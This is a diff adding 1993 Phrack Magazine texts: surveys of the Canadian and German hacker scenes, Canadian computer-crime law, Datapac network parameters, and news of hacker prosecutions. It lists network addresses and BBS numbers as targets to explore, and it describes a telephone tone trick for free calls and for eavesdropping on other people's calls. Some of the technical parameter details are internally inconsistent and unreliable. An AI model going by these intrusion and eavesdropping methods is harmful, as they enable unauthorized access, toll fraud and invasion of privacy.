+receiving end.. Rabid is based out of 416 or rather Toronto
+Canada, at it's prime Rabid was running a mail net that spanned
+Canada and were releasing enough material to employ the boys at
+McAfee. Things have changed. While Rabid had at one point been a
+productive group (if you can call a virus group productive) time
+seems to have worn their edge, in fact Rabid as a group have
+failed to release anything of value in a great long time. Perhaps
+this will change. If nothing else Rabid did bring a much needed
+ego boost to the Canadian scene, in doing so they opened the door
+for other such groups to be seen on the international level with
+out being laughed out of the nets. For this if nothing else they
+deserve recognition. There is a great deal more to be said  about
+Rabid, however as I said all the information given here will be
+cursory, if you require an information at all in the future on
+Rabid or any of the groups mentioned below I will leave an e-mail
+address below where you can write me, I will help you if I can.
+
+                 FOG out of 403 Calgary, Alberta
+
+No scene is complete without talented juveniles given to temper
+tantrums virus spreading and general malicious behavior..Enter
+FOG. FOG stands for the Fist Of God, it is for the most part a
+group of individuals who go through unnatural amounts of effort
+to get under the skin of others. Yet beyond juvenile behavior
+that tends to underscore most endeavors they undertake. FOG does
+for the most part work very diligently for a united .ca scene.
+They have in the past run a nation wide net using encrypted mail
+procedures so that dialogue could be opened between the east and
+western scenes. This event was stopped when the Hubs house was
+raided by the Royal Canadian Mounted Police for suspected telco
+abuse, they were no charges laid however yet the organizers felt
+that the information passing through the net was much too
+valuable to be compromised by a bust. The net was killed.
+
+After the net disappeared several members of FoG began writing
+bbs software to be spread across the country to make networking
+easier or rather standardized. The bbs also includes encryption
+options for the mail, and will soon be HAM radio as well as
+cellular modem capable. This program is available to any who wish
+to take it, as I said earlier, just mail me.
+
+                   NuKE Making Art out of Arrogance
+
+NuKE hails from 516 Montreal, Canada.  It as far as I can see
+primarily now a virus group. Producing and modifying strains, for
+the most part NuKE has been the most active underground .ca group
+that has seen movement on an international level, with this past
+year.
+
+It's membership has changed quite severely since I last had
+contact with them. Therefore I fear that to publish anything else
+on them would be inaccurate and therefore an injustice. However
+if you are interested in pursuing this topic........Mail me.
+
+
+As you can see these are cursory overviews of Canada's groups it
+is of course largely incomplete, I provided it only to serve as a
+guide for the feeling of Canada's groups. There are of course
+many worth mentioning that I failed to show, and moreover there
+is a great deal more to  the groups that I did mention. To those
+who are in the above groups are unhappy with the opinion put
+forth please by all means FUCKOFF. I e-mailed all of you, and in
+your infallible wisdom you failed to reply. So suffer with it :>
+
+                     .ca and the law
+
+While Canada has been for the most part largely un-abused by the
+'Computer Criminal'. It's laws are none the less fairly advanced.
+Our legislators to their credit have kept a close eye on our
+neighbors in the south, and have introduced laws accordingly.
+
+The following is the Canadian criminal code as pertaining to
+Computer Crime.
+
+342.1
+    (1) Every one who, fraudulently and without color of right,
+        (a) obtains, directly or indirectly, any computer service,
+        (b) by means of an electro-magnetic, acoustic, mechanical
+             or other device, intercepts or causes to be intercepted,
+            directly or indirectly, any function of a computer system, or,
+        (c) uses or causes to be used, directly or indirectly, a
+            computer system with intent to commit an offense under
+            paragraph (a) or (b) or an offense under section 430 in
+            relation to data or a computer system
+            is guilty of an indictable offence and liable to
+            imprisonment for a term not exceeding ten years, or is
+            guilty of an offence punishable on summary conviction.
+    (2) In this section, "computer program" means data representing
+        instructions or statements that, when executed in a computer
+        system, causes the computer to perform a function;
+        "computer service" includes data processing and the
+        storage or retrieval of data; "computer system" means
+        a device that, or a group of interconnected or related
+        devices one or more of which,
+                (a) contains computer programs or other data, and
+                (b) pursuant to computer programs,
+                    (i) performs logic and control, and
+                    (ii) may perform any other function;
+        "data" means representation of information or of concepts
+        that are being prepared or have been prepared in a form
+        suitable for use in a computer system;
+        "electro-magnetic, acoustic, mechanical or other device"
+         means any device or apparatus that is used or is capable of
+         being used to intercept any function of a computer system,
+         but does not include a hearing aid used to correct subnormal
+         hearing of the user to not better than normal hearing;
+        "function" includes logic, control, arithmetic, deletion,
+        storage and retrieval and communication of telecommunication to,
+        from or within a computer system; "intercept" includes listen
+        to or record a function of a computer system, or acquire the
+        substance, meaning or purport thereof.
+
+430.
+    [...]
+    (1.1) Every one commits mischief who willfully
+        (a) destroys or alters data;
+        (b) renders data meaningless, useless or ineffective;
+        (c) obstructs, interrupts or interferes with the lawful
+            use of data; or
+        (d) obstructs, interrupts or interferes with any person
+            in the lawful use of data or denies access to data
+            to any person who is entitled to access thereto.
+    [...]
+
+    (8) In this section, "data" has the same meaning as in
+        section 342.1.
+
+As you can see our criminal code carries severe penalties for
+both Hacking and Virus spreading however, there is little
+precedent to set sentences by. While this is reassuring, there
+seems to be a new trends to prosecute those who are caught at
+computer crime. Moreover it seems to be a trend to prosecute with
+setting precedence in mind.. So for those of you in .ca who have
+busted recently I would begin to fear right about now.
+
+For the most part most computer crime in Canada that results in
+busts is telco related, most often the charges are federal but
+the sentences are light, however as I said before, this is
+changing. And will continue to change with each new bust ,
+welcome to the new dawn I suppose.
+
+                     Datapac, Canada's first net
+
+As it stands Datapac is Canada's largest and most used
+network, it is old archaic and slow, yet still it is immense
+amounts of fun to play with. The following is a technical excerpt
+to help you understand the operation of Datapac and how to
+maneuver it. Those of you who are already familiar with the
+workings of this type of network will find this dry and
+repetitive for those of you who are not familiar it may  make for
+some learning.
+
+After the manual entry you will find a list of interesting sites
+to explore with, enjoy....
+
+              Datapac 3101 "Welcome to the Dark Ages"
+
+Interface (ITI) in a Packet Assembler/Disassembler (PAD), which
+allows the devices to access the Network over dial-up (DDD) or Dedicated
+Access Lines.
+
+ITI, the end-to-end protocol for Datapac 3101, conforms to the
+CCITT recommendations X.3, X.28 and X.29 and supports access to the
+Datapac Network for asynchronous, start-stop character mode terminals.
+
+     X.3 specifies the operation of the PAD.  It contains the
+specifications for the twenty-two International parameters and
+their operation.
+
+     X.25 specifies the command language between the terminal and
+the PAD.  It also specifies the conditions which define the command
+mode and the data transfer mode.
+
+     X.29 specifies the procedures to be followed by an X.25 DTE
+to access and modify the parameters in the PAD as well as the data
+transfer procedure.
+
+The Datapac 3101 service provides for terminal to Host (user's
+computer) and terminal to terminal communication.  The Host access
+should conform with the X.25 protocol, using the Datapac 3000 access
+service, and also support the higher level protocol conventions for ITI.
+Host access may also be provided via the Datapac 3101 service for some
+applications.  The Datapac 3101 service also provides block mode and
+tape support.
+
+INTERNATIONAL PAD PARAMETERS
+----------------------------
+
+1)   Ability to Escape from Data Transfer State*
+
+     The setting of this parameter allows the user to interrupt
+the communication of his or her application (data transfer mode) and
+interact with the PAD (common mode).  The character to do this is
+"ControlJP".  To return to data transfer mode, press the carriage
+return or enter a blank command line.  If the user wants to send a
+"ControlJP" to the Host, with this parameter set set to one, simply
+hit ControlJP twice and the second ControlJP will go to the Host and
+the user will remain in data transfer mode.  This also applies to
+the user data field in the call request command line.
+
+Parameter Number:  1
+Possible Values:   0 = Escape not possible.
+                   1 = Escape is possible.
+
+*Note:  Escape from Data transfer mode may also be possible using
+the break signal if parameter seven is set to eight.
+
+
+2)   Echo*
+
+     This parameter indicates to the PAD whether or not the
+terminal input data must be echoed.  This may be required if the user's
+terminal cannot echo back what is being entered.
+
+Parameter Number:  1
+Possible Values:   0 = No echo.
+                   1 = Echo.
+
+*Note:  Echo will also be affected by the setting of Parameter 20.
+
+
+3)   Selection of Data Forwarding Signal
+
+     This parameter indicates to the PAD the set to terminal
+generated characters or conditions that will cause data to be forwarded
+to the destination.  For example, (CR) can be used as a data forwarding
+signal on receipt of a (CR) from the local DTE Y, the PAD will forward all
+characters in its buffer to the remote end, including the (CR).  If P13 is
+set to 6.7, 22 or 23, a (LF) will be included in the packet and will delimit
+it.  Data is also forwarded when the buffer is full whether or not a
+forwarding character is received.
+
+Parameter Number:  3
+Possible Values:   0 = No data forwarding signal.
+                   2 = Forward on carriage return.
+                   2 = Carriage return.
+                 126 = All characters in columns 0 and 1
+                       of ASCII table and the character
+                       del of International alphabet #5.
+
+
+4)   Selection of Idle Timer Delay
+
+      This parameter is used to determine the idle timer limit
+value when data forwarding is based on timeouts.  To optimize packetizing
+of data, no data forwarding signal need be specified.  The PAD will then
+packetize data based on packet size specified (256 or 128 characters).
+The idle timer is used to send any packets that are not fully filled.
+If idle timer is activated and the Host requires the (CR) to input data,
+it still must be provided before the data send is accepted by the Host.
+The idle timer does not send any empty packets.
+
+
+Parameter Number:  4
+Possible Values:   0 = No data forwarding on timeout is
+                       required.
+               1-255 = Indicates value of the delay in
+                       twenties of a second.  (i.e., a
+                       value of 250 makes the time wait
+                       10 seconds)
+
+*Note:  When editing is on (P15:1), the idle timer is inactive.
+If this is the only data forwarding condition, turning the editing function
+on could cause a user terminal to hand or data not to be forwarded.
+
+5)   Auxiliary Device Control*
+
+     This is used for flow control of data coming from either a
+PC or auxiliary device, e.g.:  a paper tape machine.  When set to
+1 it indicates to the PAD that the data is to be read an auxiliary
+I/O device connected to the terminal.  This parameter set to 2 indicates
+that the data is coming from an intelligent device, i.e., a PC, and that
+the PAD must exert flow control differently.
+
+Parameter Number:  5
+Possible Values:   0 = No use of X-on/X-off.
+                   1 = Use of X-on/X-off for auxiliary
+                       devices.
+                   2 = Use of X-on/X-off for
+                       intelligent terminals.
+
+*Note:  A value of 2 is recommended for PC's.
+
+
+6)   Suppress Network Messages
+
+     This parameter indicates to the PAD whether or not Network
+generated messages are to be transmitted to the terminal.
+
+Parameter Number:  6
+Possible Values:   0 = Suppress message.
+                   1 = Transmit message.
+                   5 = PAD prompt (*) follows Datapac
+                       service signals.
+
+7)   Procedure on Break
+
+     This parameter is used to indicate how the PAD should
+process a break signal that is received from the terminal
+while the terminal is in data transfer state.
+
+Parameter Number:  7
+Possible Values:   0 = Nothing. (remain in data transfer
+                       mode)
+                   1 = Interrupt. (remain in data
+                       transfer mode)
+                   2 = Reset. (remain in data transfer
+                       mode)
+                   4 = Send an "indication of break"
+                       message to the packet mode DTE.
+                       (remain in data transfer mode)
+                   8 = Escape from data transfer mode
+                       (i.e., enter command mode)
+                  16 = Discard output to terminal
+                       activate Parameter 8 (P8:1)
+                       (remain in data transfer mode)
+                  21 = A combination of 1, 4 and 16.
+
+
+*Note:  The break signal is ignored if the virtual circuit is not
+established while in command state.  The break signal will delete
+the current line.
+
+         The valid values for P7 are 0, 1, 2, 8 and 21.
+
+8)   Discard Output
+
+     This parameter is used in conjunction with Parameter 7.
+Depending upon the break procedure selected, this parameter may be
+set by the PAD when the terminal user requests that terminal data be
+discarded.  This parameter must then be reset by the destination
+computer to allow normal delivery.  The PAD will discard all packets
+destined for the terminal from the time the PAD sets this parameter
+(i.e., it receives a break signal when Parameter 7 is set to 21) to
+the time the parameter is reset by the destination.  It can only be
+reset by the destination.
+
+Parameter Number:  8
+Possible Values:   0 = Normal delivery of output to
+                       terminal.
+                   1 = Discard output to terminal.
+
+9)   Padding after Carriage Return
+
+     This parameter is used to specify the number of padding
+characters to be inserted by the PAD following a CR transmitted
+to the terminal.  Padding allows time for the carriage to return
+on mechanical printing devices.
+
+
+Parameter Number:  9
+Possible Values:   0 = 2 padding characters will be
+                       inserted at 110 bps and 4
+                       padding characters will be
+                       inserted at higher speeds, in
+                       command mode only.  (no padding
+                       is done in data transfer mode)
+               1-255 = The number of padding characters
+                       to be inserted in both data
+                       transfer and command mode.
+
+10)  Line Folding
+
+     This parameter indicates the maximum number of printable
+characters that can be displayed on the terminal before the PAD must
+send a format effector (i.e.., <CR><LF>).  This permits more data to
+be transmitted in one packet while still letting the user print out
+more than one line, i.e., printing out forms.
+
+11)  Transmission Speed (Read only)
+
+     This parameter is set by the PAD as a result of transmission
+speed detection if the terminal accesses an autobaud port.  When a
+private port with fixed speed is used, this parameter is set based
+on the pre-stored information selected at subscription time.
+
+Parameter Number:  11
+Possible Values:    0 = 110 bps
+                    2 = 300 bps
+                    3 = 1200 bps
+                    4 = 2400 bps
+This is all very dry stuff (what buffer isn't?) however if you need more
+info on it simply mail me.
+
+                            NUA list
+20500011                Bell Northern Research
+39400100                Envoy (English/Francais)
+30400101                Envoy (Anglais/French)
+39500032                Globe and Mail
+41100015,I              Infoglobe
+59600072                University of Athabasca
+60100010                Universtiy of Alberta
+67100752                ?
+67100673                ?
+20400177                QL
+29400138                Tymnet  CIS02 7770,101 'free demo'
+20401338                Tymnet
+41100043                CSG Infoglobe
+73500023                KN Computer MCT
+59100092                Keyano College (Alberta)
+72400014                System Max-Daisey (VAX/VMS)
+69100018                Cybershare
+55500010                ?
+29400263                ?
+29400263                ?
+67100086                Sears
+67100132                Primenet
+67100489                Terminal ID=VAX
+67100629                (VAX/VMS)
+67100632                McKim Advertising (Vancouver)
+93200233                University of Manitoba
+79400100                Envoy Info/Mailbox
+92100086                Datapac General Info
+20500011                Canole II
+
+I have kept a number of sites I have, off this list simply
+to ensure I keep them, however there are thousands of Virgin
+sites available off of Dpac. Something to keep your eyes open for
+are Canadian government machines which are fairly abundant on the
+Dpac.
+
+Beyond Dpac, there are some actual BBS's worth calling, most
+however would rather not have there numbers published in Phrack. None
+the less here are some stable, and relatively active BBS's:
+
+     The Underground Subway  606-590-1147
+     Gridpoint               403-283-5519
+     The G-spot  (Rabid HQ)  416-256-9017
+     Front 242   (VX)(Rabid) 416-790-6632
+
+I am sorry for what this article did not cover, in the umpteen or so
+pages  I have punched up, I still have covered not even a tenth
+of what I would like to cover. For those who wish a reliable UG
+bbs for list .ca or more info on the Dpac or wish to elicit any other
+response to this article please e-mail me at besaville@sait.ab.ca
+
+*********************************************************************
+
+                    The German Scene
+                      (by SevenUp)
+                    ----------------
+
+CCC
+---
+
+Talking about the German Hacker Scene, the Chaos Computer Club (CCC) comes
+to most people's mind. They are most famous for their 'NASA-Hack' and their
+publications like Hackerbibel and Datenschleuder, a monthly magazine talking
+about 'softer' stuff than 2600, such as MUD's, the Internet and BBS'es.
+
+They organize the annual Chaos Communication Congress, held annually
+from December, 27th till 29th in Hamburg. Usually around 1000 people show up
+there, discussing many different topics, such as Phreaking, Internet,
+Women and Computer, Cellular Phones, Phone Cards and others. Many well-known
+people, like Pengo and Professor Brunnstein the meeting. There are usually
+also shows of Horror Movies (but no porns like at HohoCon), but it's not
+a real 'party' like SummerCon or the upcoming Hacktic Party.
+
+Another annually meeting from CCC members and many other hackers is at the
+huge computer fare 'CeBit' in Hannover in March. The Get Together is at the
+Telekom booth on Tuesday at 4pm. Usually Telekom (the German phone company)
+representatives are very kind, give away phone cards (value: $4), but
+usually don't have any interesting new informations.
+
+There haven't been any hacks affiliated with the CCC for the last couple of
+years. The CCC tries to get away from their former criminal image, talking
+mostly about risks of computers in society, and producing lots of press
+releases.
+
+The KGB Hack
+------------
+
+Most of you might know "The Cuckoo's Egg" by Cliff Stoll. His exciting
+novel talks about German Hackers hacking for the KGB.
+These guys were using the German x.25 network Datex-P to get to a US
+University, and from there to several hosts on the Arpa/Milnet (Internet).
+They were using mostly basic knowledge to get into several UNIX and VMS
+Systems, reading personal Mail and looking for documents the 'Russians'
+might have been interested in.
+
+It all ends up with the suicide (murder?) of Karl Koch, one of the hackers.
+Although these hackers weren't CCC members, there is a pretty good book
+from the CCC about it, containing more facts than Cliff's book:
+"Hacker fuer Moskau", published by Wunderlich.
+
+This is probably the best known German hack of all times.
+
+Networks
+--------
+
+I. x.25
+
+The German x.25 System is called 'Datex-P' and has the DNIC (2624).
+Dialups are in almost every area code, or can be reached locally from
+everywhere. There are also Tymnet and Sprintnet Dialups available in
+the major cities, with some limitations though. Tymnet won't connect you
+to dpac (Datapac Canada). Sprintnet has just a true dialup in Frankfurt,
+the other dialups are handled by their partner Info AG, which allow
+calling most RNUAs, but most Sprintnet NUIs won't work.
+
+There is a 'Subnet' in the Datex-P Network, the so called 'WiN'
+(which means scientific network). Almost all universities have connections
+to the WiN, which means they pay a flat rate each month, which allows
+them to make as many calls and transfer as much data to other WiN hosts,
+as they like. Usually x.25 rates are charged by the volume of packages/data.
+You can identify WiN addresses easily, because they start with
+(0262)45050... There are many gateways from WiN to Internet, and also a few
+from Internet to WiN. WiN NUAs can be reached without problem from any x.25
+network in the world, like Sprintnet or Tymnet; though most WiN PADs will
+refuse to connect to non-WiN NUAs.
+
+There are also a couple of German systems, international hackers used to like.
+The most-famous is probably Lutzifer in Hamburg, Germany. It can still
+be reached from x.25 Networks like Sprintnet or Tymnet.
+Around two years ago, British, American and other hackers used to trade
+all kinds of codez on "Lutz". But now, Pat Sisson ("frenchkiss") from Sprintnet
+Security and Dale Drew ("Bartman") from Tymnet Security, try to track
+down everyone abusing their NUIs or PADs.
+
+Before Lutzifer went up 2.5 years ago, tchh and Altos Munich were most
+attractive. They were running the same simple Korn-Chat on an Altos.
+There are still a couple of other x.25 Systems, which attract hackers
+from all over the world, like qsd, Pegasus (in France and Switzerland) and
+Secret Tectonics / sectec, a rather new semi-private Board in Germany with
+x.25 and Direct Phone Dialups, uucp/Internet Mail, File and Message Bases and
+all Phrack Issues as well.
+
+II. Internet
+
+But now, most hackers quit the x.25 scene and tried to get onto Internet.
+Unlike the fast Internet connections in the USA between .edu sites,
+German Internet connections are mostly routed through slow (9.6kbps or 64k)
+x.25 Links.
+
+This is mostly the fault of the German phone company 'Telekom'. They have a
+monopoly on phone lines in Germany and charge 2-10 times higher fees than
+American phone co's. Even local calls are US$1.50/hour.
+
+There aren't many German Internet Sites that attract foreign hackers,
+compared to US Sites that German Hackers are interested in.
+
+There are almost no public Internet BBSes with free access in Germany.
+Also, German Universities have often a pretty tight security and get
+mad easily.
+
+III. Amiga Kiddos
+
+BBS'es are still the major hang-out besides IRC. The Amiga Scene with
+its K-rad Kiddos (most of them under 18 years) used to be dominant a
+couple of years ago, trading Calling Cards and new Blue Box frequencies
+to call the best boards in the US to leech the latest games.
+But recently, the IBM scene caught up and many guys switched from Amiga
+to IBM; so over 50% of pirate boards are IBM boards now.
+
+But recently, BBS sysops have to face hard times. A couple of months
+ago, lots of BBS'es in Berlin, but also in Bavaria and North Germany
+got 'busted' - raided by the police because of their illegal warez.
+(see my article in Phrack 42 about it) The man behind these actions
+is the lawyer 'Guenther Freiherr von Gravenreuth', who works for Acti-
+vision, the SPA and BSA. He is tracking down kids with piracy as recklessly
+as BBS Sysops, who sell subscriptions for a 'Disabled Upload/Download Ratio'
+for around $100 a month. There have been a couple of these trials lately,
+without much notice by the press. Mr Gravenreuth is also responsible for
+many people's fear to put up a new BBS - especially in Bavaria where he lives.
+
+Also, calling the favorite Board in the US is getting harder and harder,
+as covered in the next Chapter.
+
+IV. The Phone System
+
+Blueboxing used to be the favorite sport of many German traders for the
+last couple of years. But some phreakers wanted to make more money,
+selling the Bluebox Story to Magazines like Capital or Spiegel, or to
+TV Shows. Even AT&T and the German Telecom, who seemed to be blind about
+this phreaking, couldn't avoid facing the truth now - they had to do
+something, not only to recover from the huge losses, but also to save
+their reputation.
+
+There are a lot of rumors and text files about the actions these phone
+companies took; most of them are fakes by 'eleet' people, who don't want
+the 'lamers' to keep the trunks and the eleet boards busy. But some actions
+seem to be certified; e. g. Telekom bought some intelligent filter boxes
+from British Telecom. These boxes should detect any C5 tones (especially
+2600 Hz), being sent by phreakers; and log the number of the phreaker,
+if possible.
+
+If possible, because the Telekom doesn't have ANI in most cases. Until
+recently, all phone lines used to be analog, pulse dialing lines
+with huge relay switches. Then the Telekom started switching to 'modern'
+digitally switched lines, which allow Touch-Tone-Dialing, and also a few
+other nice features, which I want to cover now.
+
+One of these nice features 'died' just about 3 weeks ago, because someone
+informed the new magazine 'Focus'.
+
+The trick was very simple. All you need was a digital line which allowed
+you to dial touch tone, and a 'Silver Box' - a device, that allows you to
+dial the digits 0...9, #, * and also A, B, C and D - many modems have
+this capability too.
+
+All you had to do was to dial 'B' + 'xxx' + 'yyyy', where 'B' is the
+Silver Tone B, 'xxx' is an internal Telekom code, and 'yyyy' are the last
+four digits of a phone number. The internal codes 'xxx' usually look like
+010, 223, 011, and so on - they switch you to an exchange, mostly in your
+own area code, but often in a different one! Notice that exchange number and
+internal code are different. When you are connected to a certain exchange,
+dialing the four 'yyyy' digits connects you to a certain phone number in
+that exchange. This enables you to make free calls - also to different area
+codes, but you have to try around to find which code matches with which
+exchange. But that's not all; now the fun just begins! Imagine the number
+you dial is busy... you won't hear a busy signal then, you would just be
+connected into the call! You could listen to the conversation of two parties!
+Imagine how much fun this could be... and imagine someone would be listening
+to your private conversations!
+
+When Telekom read the article, most area codes lost this capability;
+but there are still some reported to work.
+
+Blueboxing is getting harder and harder, MCI and AT&T keep on changing their
+'Break' frequencies more rapidly (though they still use in-band CCITT C5
+signalling); so more and more people offer Calling Card subscriptions, and
+even more traders, who refuse paying Telekom's high fees, buy them. They
+are offered mostly by Americans, Belgium people and Germans, for about $100
+a month. Also, I haven't heard of any case where a German got busted for
+abusing AT&T's Calling Cards; probably because Telekom can't really trace
+phones lines, either technically nor legally (they may not just 'tap' phone
+lines because of people's privacy).
+
+Also, German Toll Free Numbers (they start with 0130) are getting more and
+more. I would take a guess and say they grow 20%-80% a year. There isn't any
+official directory nor a directory assistance for these numbers, and many
+companies want these numbers to remain 'unknown' to the evil hackers, since
+Telekom is asking high fees for them.
+
+So many Germans compile and scan these numbers; there is also a semi-public
+list on them by SLINK - available on many BBS'es and on local German Newsgroups.
+This list also contains numbers of business companies like Microsoft,
+Hewlett Packard or Dell in Austin (hi erik :) ), so it is quite useful for
+'normal people' too.
+
+There have also been reported the first PBX-like Systems in Germany; this is
+quite a sensation, because German Telekom laws don't allow PBX'es, or even the
+linking of two phone lines (like 3-way calling). So in fact, these Systems
+weren't real PBX'es, but Merial Mail VMB Systems with the Outdial feature.
+
+PaRtY 0n!
+---------
+
+There are a couple of interesting get-togethers and parties.
+I mentioned the annual Chaos Communication Congress after Christmas;
+the CCC also has weekly meetings on Tuesday. There are the annual
+CeBIT hacker parties, on the Tuesday at CeBIT in March. After the
+CeBIT meeting and weekly, there are get-togethers  at the 'Bo22',
+a cafe in Hannover. These meetings have tradition since the KGB
+Hacks of Pengo and 'Hagbard Celine' Karl Koch, as I mentioned above.
+You will still find friends of them there, if you drop by on a Tuesday.
+Since a couple of months and with Emmanuel Goldstein's great support,
+we are having 2600 meetings in Munich, Germany too! These are the first
+2600 meetings outside of the US; the first meeting was quite successful
+with over 30 people, and the next one in July will be successful too,
+hopefully. Some international visitors from the US are expected, too.
+These meetings are held at around 6pm in front of Burger King at
+Central Station, Munich. I also like to thank Munich's Number One
+Hit Radio Station 89 HIT FM at this point, for letting us into the
+air for 3 minutes, talking about the 2600 meeting and a bit about 'hacking'.
+There are also semi-annual IRC parties in Germany, but they are
+'just' parties with usually 100-150 people. Hacking and phreaking
+isn't a topic there; probably less than 10% of them know what H/P means.
\ No newline at end of file
diff --git a/phrack43/27.txt b/phrack43/27.txt
new file mode 100644
index 0000000..98bae3c
--- /dev/null
+++ b/phrack43/27.txt
@@ -0,0 +1,508 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 27 of 27
+
+              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+New Yorker Admits Cracking                              July 3, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+(From AP Newswire Sources)
+
+ Twenty-one-year-old Mark Abene of New York, known as "Phiber Optik" in
+ the underground computing community, has pleaded guilty to charges he
+ participated in a group that broke into computers used by phone companies
+ and credit reporting services.
+
+ The Reuter News Service says Abene was the last of the five young men
+ indicted in the huge 1991 computer break-in scheme to admit committing the
+ crimes. The group called itself "MOD," an acronym used for "Masters of
+ Disaster" and "Masters of Deception."
+
+ Abene pleaded guilty to one count of conspiracy and one count of
+ unlawful access to computers. He faces a possible maximum prison term of
+ 10 years and fine of $500,000.
+
+-----------------------------------------------------------------------------
+
+China Executes Computer Intruder                        April 26, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(From AP Newswire Sources)
+
+ A man accused of invading a computer and embezzling some
+ $192,000 has been executed in China.
+
+ Shi Biao, an accountant at the Agricultural Bank of China's Jilin
+ branch, was accused of forging deposit slips from Aug. 1 to
+ Nov. 18, 1991.
+
+ The crime was the first case of bank embezzlement via
+ computer in China.  Authorities became aware of the plot
+ when Shi and his alleged accomplice, Yu Lixin, tried to wire
+ part of the money to Shenzhen in southern China.
+
+-----------------------------------------------------------------------------
+
+Teen Takes the A Train --- Literally                    May 13, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(From AP Newswire sources)
+
+ A 16 year old 10th grader successfully conveyed passengers on a NYC 10 car
+ subway train for 2.5 hours until he went around a curve too quickly and
+ could not reset the emergency brakes. Keron Thomas dressed as a NY subway
+ train engineer impersonated Regoberto Sabio, a REAL subway motorman, while he
+ was on vacation and even obtained Sabio's "pass number".
+
+ Thomas was a Subway enthusiast who hung around train stations and areas
+ where subway motormen and other subway workers hang out. A NYC subway
+ spokesman was quoted as saying "Buffs like to watch...pretty soon they
+ figure out how" [to run the train]. "This guy really knew what he was doing".
+
+ Thomas was charged with criminal trespassing, criminal impersonation, and
+ reckless endangerment.
+
+-----------------------------------------------------------------------------
+
+Banks React To Scheme That Used Phony ATM               May 13, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(From AP Newswire Sources)
+
+ At least three people are believed to be involved in an ATM scam that is
+ thought to have netted roughly $ 60,000. The fraud was perpetrated by
+ obtaining a real ATM machine (theorized to have been stolen from a warehouse)
+ and placing it in a Connecticut shopping mall.
+
+ When people attempted to use the machine, they received a message that the
+ machine wasn't working correctly and gave back the card.  Little did they
+ know that their bank account number and PIN code was recorded.  The fake
+ machine was in place for about 2 weeks. It was removed and the thieves
+ began making withdrawals.
+
+ The Secret Service thinks the scammers recorded anywhere from 2000 to 3000
+ account numbers/pin codes but did not get a chance to counterfeit
+ and withdraw money except from a few hundred accounts before it
+ became too dangerous to continue
+
+-----------------------------------------------------------------------------
+
+Hacker Gets Jail Time                                   June 5, 1993
+~~~~~~~~~~~~~~~~~~~~~
+(Newsday) (Page 13)
+
+ A Brooklyn College film student, who was part of a group that allegedly broke
+ into computer systems operated by major telephone companies, was sentenced
+ yesterday to 1 year and 1 day in prison.
+
+ John Lee, 21, of Bedford Stuyvesant, also was sentenced to 200 hours of
+ community service, which Manhattan Federal District Court Judge Richard Owen
+ recommended he spend teaching others to use computers.  Lee had pled guilty
+ December 3, 1992, to a conspiracy charge involving computer tampering, fraud
+ and illegal wiretapping.
+
+_______________________________________________________________________________
+
+Hacker Gets Prison Term For Phone Computer Tampering    June 4, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Gail Appleson (The Reuter Business Report)
+
+ NEW YORK -- A computer hacker known as "Corrupt" who was part of a group that
+ broke into computer systems operated by major telephone companies was
+ sentenced Friday to one year and one day in prison.
+
+ The defendant, John Lee, 21, of New York had pleaded guilty December 3, 1992
+ to a conspiracy charge involving computer tampering, fraud and illegal
+ wiretapping.
+
+ The indictment alleges the defendants broke into computer switching systems
+ operated by Southwestern Bell, New York Telephone, Pacific Bell, U.S. West
+ and Martin Marietta Electronics Information and Missile Group.
+
+ Southwestern Bell allegedly lost $370,000 because of the crimes.
+
+ The defendants also allegedly tampered with systems owned by the nation's
+ largest credit reporting companies including TRW, Trans Union and Information
+ America.  They allegedly obtained 176 TRW credit reports on various
+ individuals.
+
+ The indictment alleged the group broke into the computers "to enhance their
+ image and prestige among other computer hackers and to harass and intimidate
+ rival hackers and other people they did not like."
+_______________________________________________________________________________
+
+Professional Computer Hackers First To Land In Jail Under New Law  June 4, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Nicholas Hills (The Vancouver Sunds)(Page A11)
+
+LONDON -- In Brussels, they were celebrated as the two young men who broke the
+gaudy secrets of EC president Jacques Delors' expense accounts.
+
+In Sweden, they were known as the Eight-Legged Groove Machine, bringing down
+part of the country's telephone network, forcing a highly publicized apology
+from a government minister who said the chaos was all due to a 'technical
+fault'.
+
+They also broke into various European defense ministry networks, academic
+systems at Hull University and the financial records of the leading London
+bankers, S.G. Warburg.
+
+No, these weren't two happy-go-lucky burglars; but rather, professional
+computer hackers, aged 24 and 22, who made legal as well as technological
+history by being the first offenders of this new trade to be jailed for their
+crimes under new British law.
+
+Neil Woods and Karl Strickland have gone to prison for six months each for
+penetrating  computer  systems in 15 different countries.  The ease with which
+they conducted this exercise, and their attitude that they were simply engaging
+in "intellectual joyriding," has confirmed the worst fears of legal and
+technological experts that computer hacking in Europe, at least, has become a
+virtually uncontrollable virus.
+
+The case became a cause celebre because of what had happened months before in
+another courtroom where a teenage computer addict who had hacked into the White
+House system, the EC, and even the Tokyo Zoo -- using a $400 birthday present
+from his mother -- had walked free because a jury accepted, basically, that a
+computer had taken over his mind.
+
+The case of 19-year-old Paul Bedworth, who began hacking at the age of 14, and
+is now studying "artificial intelligence" at Edinburgh University, provides an
+insight into why hackers have turned the new computer world into an equivalent
+state of delirium tremens.
+
+Bedworth and two young friends caused thousands of dollars worth of damage to
+computer systems in Britain and abroad. They were charged with criminal
+conspiracy under the Computer Misuse Act of 1990.
+
+Bedworth never did deny computer hacking at his trial, and did not give
+evidence in his defense.  He simply said through his lawyer that there could
+not have been any criminal intent because of his "pathological obsession" with
+computers.
+
+A jury of eight men and three women unanimously acquitted him.
+
+Until the passage of the Computer Misuse Act in 1990, hacking was legal in
+Britain.  Bedworth may have been found not guilty, but his activities were so
+widespread that the authorities' investigation involved eight different British
+police forces, and others from as far afield as Finland and Singapore.  It
+produced so much evidence - mostly on disk - that if it had been printed out on
